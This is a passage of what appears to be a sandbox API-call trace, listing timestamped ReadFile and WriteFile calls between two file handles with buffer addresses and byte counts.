hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.948] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.948] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.949] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.949] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.950] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.950] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.951] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.951] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.952] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.952] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.952] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.953] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.954] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.954] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.955] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.955] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.956] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.956] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.956] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x83, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.958] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.958] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.959] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.959] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.960] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.960] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.961] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.961] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.962] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.962] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.962] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.963] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.963] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.964] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x343, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.964] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.965] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.965] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.966] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.966] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.967] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.967] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.967] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.968] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.969] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.969] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.970] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.970] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.971] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.971] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.972] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.972] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.973] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.973] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.974] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.974] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.974] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.975] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.975] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.976] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.976] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.977] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.977] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.978] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.978] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.979] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.979] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.980] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.980] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.980] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.981] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.981] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.982] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.982] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.983] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.983] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.984] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.996] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.996] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.997] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.997] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.998] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.998] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.999] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.999] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.000] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.033] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.033] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.034] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.034] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.035] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x67, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.035] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.036] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.037] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.037] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 